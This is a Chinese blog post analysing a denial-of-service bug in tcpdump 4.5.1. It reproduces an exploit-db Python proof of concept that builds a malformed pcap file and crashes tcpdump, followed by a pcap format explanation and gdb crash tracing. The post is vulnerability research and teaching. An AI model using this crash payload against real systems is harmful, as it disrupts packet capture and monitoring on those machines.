2019-07-01 09:29:47 +00:00
<!DOCTYPE html>
2021-04-10 12:03:10 +00:00
< html class = "theme-next muse use-motion" lang = "zh-Hans" >
2019-07-01 09:29:47 +00:00
< head > < meta name = "generator" content = "Hexo 3.8.0" >
< meta charset = "UTF-8" >
< meta http-equiv = "X-UA-Compatible" content = "IE=edge" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, maximum-scale=1" >
< meta name = "theme-color" content = "#222" >
2021-04-10 19:19:48 +00:00
< script src = "/lib/pace/pace.min.js?v=1.0.2" > < / script >
< link href = "/lib/pace/pace-theme-center-atom.min.css?v=1.0.2" rel = "stylesheet" >
2019-07-01 09:29:47 +00:00
< meta http-equiv = "Cache-Control" content = "no-transform" >
< meta http-equiv = "Cache-Control" content = "no-siteapp" >
< link href = "/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel = "stylesheet" type = "text/css" >
< link href = "/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel = "stylesheet" type = "text/css" >
< link href = "/css/main.css?v=5.1.4" rel = "stylesheet" type = "text/css" >
< link rel = "apple-touch-icon" sizes = "180x180" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "32x32" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "16x16" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "mask-icon" href = "/images/logo.svg?v=5.1.4" color = "#222" >
< meta name = "keywords" content = "TCPDUMP,拒绝服务攻击," >
2021-04-10 13:53:56 +00:00
< meta name = "description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析" >
2019-07-01 09:29:47 +00:00
< meta name = "keywords" content = "TCPDUMP,拒绝服务攻击" >
< meta property = "og:type" content = "article" >
< meta property = "og:title" content = "TCPDUMP拒绝服务攻击漏洞" >
< meta property = "og:url" content = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html" >
< meta property = "og:site_name" content = "混元霹雳手" >
2021-04-10 13:53:56 +00:00
< meta property = "og:description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析" >
2019-07-01 09:29:47 +00:00
< meta property = "og:locale" content = "zh-Hans" >
2021-04-10 13:53:56 +00:00
< meta property = "og:updated_time" content = "2021-04-10T13:48:18.517Z" >
2019-07-01 09:29:47 +00:00
< meta name = "twitter:card" content = "summary" >
< meta name = "twitter:title" content = "TCPDUMP拒绝服务攻击漏洞" >
2021-04-10 13:53:56 +00:00
< meta name = "twitter:description" content = "TCPDUMP 4.5.1 拒绝服务攻击漏洞分析" >
2019-07-01 09:29:47 +00:00
< script type = "text/javascript" id = "hexo.configurations" >
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
2021-04-10 12:03:10 +00:00
scheme: 'Muse',
2019-07-01 09:29:47 +00:00
version: '5.1.4',
2021-04-10 19:19:48 +00:00
sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
2019-07-01 09:29:47 +00:00
fancybox: true,
tabs: true,
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
duoshuo: {
userId: '0',
author: '博主'
},
algolia: {
applicationID: '',
apiKey: '',
indexName: '',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
< / script >
< link rel = "canonical" href = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" >
< title > TCPDUMP拒绝服务攻击漏洞 | 混元霹雳手< / title >
< / head >
< body itemscope itemtype = "http://schema.org/WebPage" lang = "zh-Hans" >
< div class = "container sidebar-position-left page-post-detail" >
< div class = "headband" > < / div >
< header id = "header" class = "header" itemscope itemtype = "http://schema.org/WPHeader" >
< div class = "header-inner" > < div class = "site-brand-wrapper" >
< div class = "site-meta " >
< div class = "custom-logo-site-title" >
< a href = "/" class = "brand" rel = "start" >
< span class = "logo-line-before" > < i > < / i > < / span >
< span class = "site-title" > 混元霹雳手< / span >
< span class = "logo-line-after" > < i > < / i > < / span >
< / a >
< / div >
2019-07-24 03:51:42 +00:00
< p class = "site-subtitle" > < / p >
2019-07-01 09:29:47 +00:00
< / div >
< div class = "site-nav-toggle" >
< button >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< / button >
< / div >
< / div >
< nav class = "site-nav" >
< ul id = "menu" class = "menu" >
< li class = "menu-item menu-item-home" >
< a href = "/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-home" > < / i > < br >
首页
< / a >
< / li >
< li class = "menu-item menu-item-about" >
< a href = "/about/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-user" > < / i > < br >
关于
< / a >
< / li >
< li class = "menu-item menu-item-tags" >
< a href = "/tags/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-tags" > < / i > < br >
标签
< / a >
< / li >
< li class = "menu-item menu-item-categories" >
< a href = "/categories/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-th" > < / i > < br >
分类
< / a >
< / li >
< li class = "menu-item menu-item-archives" >
< a href = "/archives/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-archive" > < / i > < br >
归档
< / a >
< / li >
< li class = "menu-item menu-item-bookmarks" >
< a href = "/bookmarks/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-map" > < / i > < br >
书签
< / a >
< / li >
2019-08-08 12:42:56 +00:00
2019-08-08 12:47:43 +00:00
< li class = "menu-item menu-item-hack之外" >
2019-08-08 12:42:56 +00:00
< a href = "/hack之外/" rel = "section" >
2019-08-08 12:52:19 +00:00
< i class = "menu-item-icon fa fa-fw fa-heartbeat" > < / i > < br >
2019-08-08 12:42:56 +00:00
2019-08-08 12:52:19 +00:00
HACK之外
2019-08-08 12:42:56 +00:00
< / a >
< / li >
2019-07-01 09:29:47 +00:00
< / ul >
< / nav >
< / div >
< / header >
< main id = "main" class = "main" >
< div class = "main-inner" >
< div class = "content-wrap" >
< div id = "content" class = "content" >
< div id = "posts" class = "posts-expand" >
< article class = "post post-type-normal" itemscope itemtype = "http://schema.org/Article" >
< div class = "post-block" >
< link itemprop = "mainEntityOfPage" href = "https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" >
< span hidden itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< meta itemprop = "name" content = "Cool-Y" >
< meta itemprop = "description" content >
< meta itemprop = "image" content = "/images/avatar.png" >
< / span >
< span hidden itemprop = "publisher" itemscope itemtype = "http://schema.org/Organization" >
< meta itemprop = "name" content = "混元霹雳手" >
< / span >
< header class = "post-header" >
< h1 class = "post-title" itemprop = "name headline" > TCPDUMP拒绝服务攻击漏洞< / h1 >
< div class = "post-meta" >
< span class = "post-time" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-calendar-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 发表于< / span >
< time title = "创建于" itemprop = "dateCreated datePublished" datetime = "2018-12-25T12:26:05+08:00" >
2018-12-25
< / time >
< / span >
< span class = "post-category" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-folder-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 分类于< / span >
< span itemprop = "about" itemscope itemtype = "http://schema.org/Thing" >
< a href = "/categories/二进制/" itemprop = "url" rel = "index" >
< span itemprop = "name" > 二进制< / span >
< / a >
< / span >
< / span >
< span id = "/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" class = "leancloud_visitors" data-flag-title = "TCPDUMP拒绝服务攻击漏洞" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-eye" > < / i >
< / span >
< span class = "post-meta-item-text" > 阅读次数: < / span >
< span class = "leancloud-visitors-count" > < / span >
< / span >
< div class = "post-wordcount" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-file-word-o" > < / i >
< / span >
< span title = "字数统计" >
2019-07-16 09:15:34 +00:00
3.4k 字
2019-07-01 09:29:47 +00:00
< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-clock-o" > < / i >
< / span >
< span title = "阅读时长" >
2019-07-16 09:15:34 +00:00
16 分钟
2019-07-01 09:29:47 +00:00
< / span >
< / div >
2021-04-10 13:53:56 +00:00
< div class = "post-description" >
TCPDUMP 4.5.1 拒绝服务攻击漏洞分析
< / div >
2019-07-01 09:29:47 +00:00
< / div >
< / header >
< div class = "post-body" itemprop = "articleBody" >
2021-04-10 13:53:56 +00:00
< h2 id = "Tcpdump介绍" > < a href = "#Tcpdump介绍" class = "headerlink" title = "Tcpdump介绍" > < / a > Tcpdump介绍< / h2 > < ol >
2019-07-01 09:29:47 +00:00
< li > tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统: 包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中, tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump; 它需要WinPcap驱动, 相当于在Linux平台下的libpcap.< / li >
< li > tcpdump能够分析网络行为, 性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤, 并提供and、or、not等逻辑语句来帮助你去掉无用的信息, 从而使用户能够进一步找出问题的根源。< / li >
< li > 也可以使用 tcpdump 的实现特定目的,例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量, 如Telnet或HTTP的数据包, 查看登录的用户名、密码、网址、正在浏览的网站内容, 或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁, 而是对网络上的其他计算机的安全存在威胁。< / li >
< / ol >
< h2 id = "分析环境" > < a href = "#分析环境" class = "headerlink" title = "分析环境" > < / a > 分析环境< / h2 > < ul >
< li > Ubuntu 16.04.4 LTS i686< / li >
< li > tcpdump 4.5.1< / li >
< li > gdb with peda< / li >
< / ul >
< h2 id = "漏洞复现" > < a href = "#漏洞复现" class = "headerlink" title = "漏洞复现" > < / a > 漏洞复现< / h2 > < p > 这个漏洞触发的原因是, tcpdump在处理特殊的pcap包的时候, 由于对数据包传输数据长度没有进行严格的控制, 导致在连续读取数据包中内容超过一定长度后, 会读取到无效的内存空间, 从而导致拒绝服务的发生。对于这个漏洞, 首先要对pcap包的结构进行一定的分析, 才能够最后分析出漏洞的成因, 下面对这个漏洞进行复现。< / p >
2019-07-16 09:15:34 +00:00
< h3 id = "编译安装tcpdump" > < a href = "#编译安装tcpdump" class = "headerlink" title = "编译安装tcpdump" > < / a > 编译安装tcpdump< / h3 > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. # apt-get install libpcap-dev< / span > < br > < span class = "line" > 2. # dpkg -l libpcap-dev< / span > < br > < span class = "line" > 3. # wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > 4. # tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > 5. # cd tcpdump-4.5.1/< / span > < br > < span class = "line" > 6. # ./configure< / span > < br > < span class = "line" > 7. # make< / span > < br > < span class = "line" > 8. # make install< / span > < br > < span class = "line" > 9. # tcpdump – -version< / span > < br > < span class = "line" > tcpdump version 4.5.1< / span > < br > < span class = "line" > libpcap version 1.7.4< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< h3 id = "生成payload( 来自exploit-db-payload) " > < a href = "#生成payload( 来自exploit-db-payload) " class = "headerlink" title = "生成payload( 来自exploit-db payload) " > < / a > 生成payload( 来自exploit-db payload) < / h3 > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > # Exploit Title: tcpdump 4.5.1 Access Violation Crash< / span > < br > < span class = "line" > # Date: 31st May 2016< / span > < br > < span class = "line" > # Exploit Author: David Silveiro< / span > < br > < span class = "line" > # Vendor Homepage: http://www.tcpdump.org< / span > < br > < span class = "line" > # Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz< / span > < br > < span class = "line" > # Version: 4.5.1< / span > < br > < span class = "line" > # Tested on: Ubuntu 14 LTS< / span > < br > < span class = "line" > from subprocess import call< / span > < br > < span class = "line" > from shlex import split< / span > < br > < span class = "line" > from time import sleep< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > def crash():< / span > < br > < span class = "line" > command = ' tcpdump -r crash' < / span > < br > < span class = "line" > buffer = ' \xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff' < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00' < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00\x00\x00\x08\x00\x00\x00\x00< \x9c7@\xff\x00' < / span > < br > < span class = "line" > buffer += ' \x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a' < / span > < br > < span class = "line" > buffer += " \x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0& \x80\x18\' " < / span > < br > < span class = "line" > buffer += " xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n' , ' \x00\x00\x00\x00" < / span > < br > < span class = "line" > buffer += ' \x00\x00\x00\x00\x01\x03\x03\x04' < / span > < br > < span class = "line" > with open(' crash' , ' w+b' ) as file:< / span > < br > < span class = "line" > file.write(buffer)< / span > < br > < span class = "line" > try:< / span > < br > < span class = "line" > call(split(command))< / span > < br > < span class = "line" > print(" Exploit successful! " )< / span > < br > < span class = "line" > except:< / span > < br > < span class = "line" > print(" Error: Something has gone wrong!" )< / span > < br > < span class = "line" > def main():< / span > < br > < span class = "line" > print(" Author: David Silveiro " )< / span > < br > < span class = "line" > print(" tcpdump version 4.5.1 Access Violation Crash " )< / span > < br > < span class = "line" > sleep(2)< / span > < br > < span class = "line" > crash()< / span > < br > < span class = "line" > if __name__ == " __main__" :< / span > < br > < span class = "line" > main()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< h2 id = "崩溃分析" > < a href = "#崩溃分析" class = "headerlink" title = "崩溃分析" > < / a > 崩溃分析< / h2 > < h3 id = "pcap包格式" > < a href = "#pcap包格式" class = "headerlink" title = "pcap包格式" > < / a > pcap包格式< / h3 > < p > 首先来分析一下pcap包的格式, 首先是pcap文件头的内容, 在.h有所定义, 这里将结构体以及对应变量含义都列出来。< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > struct pcap_file_header { < / span > < br > < span class = "line" > bpf_u_int32 magic;< / span > < br > < span class = "line" > u_short version_major;< / span > < br > < span class = "line" > u_short version_minor;< / span > < br > < span class = "line" > bpf_int32 thiszone; /* gmt to local correction */< / span > < br > < span class = "line" > bpf_u_int32 sigfigs; /* accuracy of timestamps */< / span > < br > < span class = "line" > bpf_u_int32 snaplen; /* max length saved portion of each pkt */< / span > < br > < span class = "line" > bpf_u_int32 linktype; /* data link type (LINKTYPE_*) */< / span > < br > < span class = "line" > } ;< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 看一下各字段的含义:< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > magic: 4字节 pcap文件标识 目前为“d4 c3 b2 a1”< / span > < br > < span class = "line" > major: 2字节 主版本号 #define PCAP_VERSION_MAJOR 2< / span > < br > < span class = "line" > minor: 2字节 次版本号 #define PCAP_VERSION_MINOR 4< / span > < br > < span class = "line" > thiszone: 4字节 时区修正 并未使用, 目前全为0< / span > < br > < span class = "line" > sigfigs: 4字节 精确时间戳 并未使用, 目前全为0< / span > < br > < span class = "line" > snaplen: 4字节 抓包最大长度 如果要抓全, 设为0x0000ffff( 65535) , < / span > < br > < span class = "line" > tcpdump -s 0就是设置这个参数, 缺省为68字节< / span > < br > < span class = "line" > linktype: 4字节 链路类型 一般都是1: ethernet< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > struct pcap_pkthdr { < / span > < br > < span class = "line" > struct timeval ts; /* time stamp */< / span > < br > < span class = "line" > bpf_u_int32 caplen; /* length of portion present */< / span > < br > < span class = "line" > bpf_u_int32 len; /* length this packet (off wire) */< / span > < br > < span class = "line" > } ;< / span > < br > < span class = "line" > struct timeval { < / span > < br > < span class = "line" > long tv_sec; /* seconds (XXX should be time_t) */< / span > < br > < span class = "line" > suseconds_t tv_usec; /* and microseconds */< / span > < br > < span class = "line" > } ;< / span > < br > < span class = "line" > ts: 8字节 抓包时间 4字节表示秒数, 4字节表示微秒数< / span > < br > < span class = "line" > caplen: 4字节 保存下来的包长度( 最多是snaplen, 比如68字节) < / span > < br > < span class = "line" > len: 4字节 数据包的真实长度, 如果文件中保存的不是完整数据包, 可能比caplen大< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
2019-07-01 09:29:47 +00:00
< p > 其中len变量是值得关注的, 因为在crash文件中, 对应len变量的值为00 3C 9C 37< br > 这是一个很大的值, 读取出来就是379C3C00, 数非常大, 实际上在wireshark中打开这个crash文件, 就会报错, 会提示这个数据包的长度已经超过了范围, 而换算出来的长度就是379C3C00, 这是触发漏洞的关键。< / p >
2019-07-16 09:15:34 +00:00
< h3 id = "gdb调试" > < a href = "#gdb调试" class = "headerlink" title = "gdb调试" > < / a > gdb调试< / h3 > < p > 首先通过gdb运行tcpdump, 用-r参数打开poc生成的crash, tcp崩溃, 到达漏洞触发位置< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. Program received signal SIGSEGV, Segmentation fault.< / span > < br > < span class = "line" > 2. [----------------------------------registers-----------------------------------]< / span > < br > < span class = "line" > 3. EAX: 0x1< / span > < br > < span class = "line" > 4. EBX: 0x81e33bd --> 0x0< / span > < br > < span class = "line" > 5. ECX: 0x2e (' .' )< / span > < br > < span class = "line" > 6. EDX: 0x0< / span > < br > < span class = "line" > 7. ESI: 0xbfffe201 (' .' < repeats 14 times> )< / span > < br > < span class = "line" > 8. EDI: 0xbfffe1db --> 0x30303000 (' ' )< / span > < br > < span class = "line" > 9. EBP: 0x10621< / span > < br > < span class = "line" > 10. ESP: 0xbfffe1ac --> 0x8053caa (< hex_and_ascii_print_with_offset+170> : mov ecx,DWORD PTR [esp+0xc])< / span > < br > < span class = "line" > 11. EIP: 0x8053c6a (< hex_and_ascii_print_with_offset+106> : movzx edx,BYTE PTR [ebx+ebp*2+0x1])< / span > < br > < span class = "line" > 12. EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)< / span > < br > < span class = "line" > 13. [-------------------------------------code-------------------------------------]< / span > < br > < span class = "line" > 14. 0x8053c5d < hex_and_ascii_print_with_offset+93> : je 0x8053d40 < hex_and_ascii_print_with_offset+320> < / span > < br > < span class = "line" > 15. 0x8053c63 < hex_and_ascii_print_with_offset+99> : mov ebx,DWORD PTR [esp+0x18]< / span > < br > < span class = "line" > 16. 0x8053c67 < hex_and_ascii_print_with_offset+103> : sub esp,0x4< / span > < br > < span class = "line" > 17. => 0x8053c6a < hex_and_ascii_print_with_offset+106> : movzx edx,BYTE PTR [ebx+ebp*2+0x1]< / span > < br > < span class = "line" > 18. 0x8053c6f < hex_and_ascii_print_with_offset+111> : movzx ecx,BYTE PTR [ebx+ebp*2]< / span > < br > < span class = "line" > 19. 0x8053c73 < hex_and_ascii_print_with_offset+115> : push edx< / span > < br > < span class = "line" > 20. 0x8053c74 < hex_and_ascii_print_with_offset+116> : mov ebx,edx< / span > < br > < span class = "line" > 21. 0x8053c76 < hex_and_ascii_print_with_offset+118> : mov DWORD PTR [esp+0x18],edx< / span > < br > < span class = "line" > 22. [------------------------------------stack-------------------------------------]< / span > < br > < span class = "line" > 23. 0000| 0xbfffe1ac --> 0x8053caa (< hex_and_ascii_print_with_offset+170> : mov ecx,DWORD PTR [esp+0xc])< / span > < br > < span class = "line" > 24. 0004| 0xbfffe1b0 --> 0xb7fff000 --> 0x23f3c< / span > < br > < span class = "line" > 25. 0008| 0xbfffe1b4 --> 0x1< / span > < br > < span class = "line" > 26. 0012| 0xbfffe1b8 --> 0x2f5967 (' gY/' )< / span > < br > < span class = "line" > 27. 0016| 0xbfffe1bc --&
< p > 从崩溃信息来看, 出错位置为s2 = < em > cp++;崩溃原因为SIGSEGV, 即进程执行了一段无效的内存引用或发生段错误。可以看到, 问题出现在./print-ascii.c:91, 而且此时指针读取[ebx+ebp< / em > 2+0x1]的内容,可能是越界读取造成的崩溃。< br > 再结合源码信息可知, 指针cp在自加的过程中访问到了一个没有权限访问的地址, 因为这是写在一个while循环里, 也就是是说nshorts的值偏大, 再看nshorts怎么来的, 由此nshorts = length / sizeof(u_short);可知, 可能是函数传入的参数length没有控制大小导致, 因此目标就是追踪length是如何传入的。< br > 我们通过bt回溯一下调用情况。< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. gdb-peda$ bt< / span > < br > < span class = "line" > 2. #0 hex_and_ascii_print_with_offset (ident=0x80c04af " \n\t" , cp=0x8204000 < error: Cannot access memory at address 0x8204000> ,< / span > < br > < span class = "line" > 3. length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91< / span > < br > < span class = "line" > 4. #1 0x08053e26 in hex_and_ascii_print (ident=0x80c04af " \n\t" , cp=0x81e33bd " " , length=0xfffffff3) at ./print-ascii.c:127< / span > < br > < span class = "line" > 5. #2 0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 < Gndo> , h=0xbfffe40c, p=< optimized out> ) at ./print-802_15_4.c:180< / span > < br > < span class = "line" > 6. #3 0x080a0aea in print_packet (user=0xbfffe4dc " \023\036\b\300\034\005\b\001" , h=0xbfffe40c, sp=0x81e33a8 " @\377" )< / span > < br > < span class = "line" > 7. at ./tcpdump.c:1950< / span > < br > < span class = "line" > 8. #4 0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.8< / span > < br > < span class = "line" > 9. #5 0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.8< / span > < br > < span class = "line" > 10. #6 0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:1569< / span > < br > < span class = "line" > 11. #7 0xb7de9637 in __libc_start_main (main=0x804a4c0 < main> , argc=0x3, argv=0xbffff6c4, init=0x80b1230 < __libc_csu_init> ,< / span > < br > < span class = "line" > 12. fini=0x80b1290 < __libc_csu_fini> , rtld_fini=0xb7fea880 < _dl_fini> , stack_end=0xbffff6bc) at ../csu/libc-start.c:291< / span > < br > < span class = "line" > 13. #8 0x0804c245 in _start ()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 函数调用流程< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > pcap_loop< / span > < br > < span class = "line" > |----print_packet< / span > < br > < span class = "line" > |-----hex_and_ascii_print< / span > < br > < span class = "line" > |-------- hex_and_ascii_print_with_offset< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
< p > 由此可见, 从main函数开始了一连串函数调用, git源码下来看看。< br > tcpdump.c找到pcap_loop调用< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > 1. do { < / span > < br > < span class = "line" > 2. status = pcap_loop(pd, cnt, callback, pcap_userdata);< / span > < br > < span class = "line" > 3. if (WFileName == NULL) { < / span > < br > < span class = "line" > 4. /*< / span > < br > < span class = "line" > 5. * We' re printing packets. Flush the printed output,< / span > < br > < span class = "line" > 6. * so it doesn' t get intermingled with error output.< / span > < br > < span class = "line" > 7. */< / span > < br > < span class = "line" > 8. if (status == -2) { < / span > < br > < span class = "line" > 9. /*< / span > < br > < span class = "line" > 10. * We got interrupted, so perhaps we didn' t< / span > < br > < span class = "line" > 11. * manage to finish a line we were printing.< / span > < br > < span class = "line" > 12. * Print an extra newline, just in case.< / span > < br > < span class = "line" > 13. */< / span > < br > < span class = "line" > 14. putchar(' n' );< / span > < br > < span class = "line" > 15. } < / span > < br > < span class = "line" > 16. (void)fflush(stdout);< / span > < br > < span class = "line" > 17. } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
2019-07-01 09:29:47 +00:00
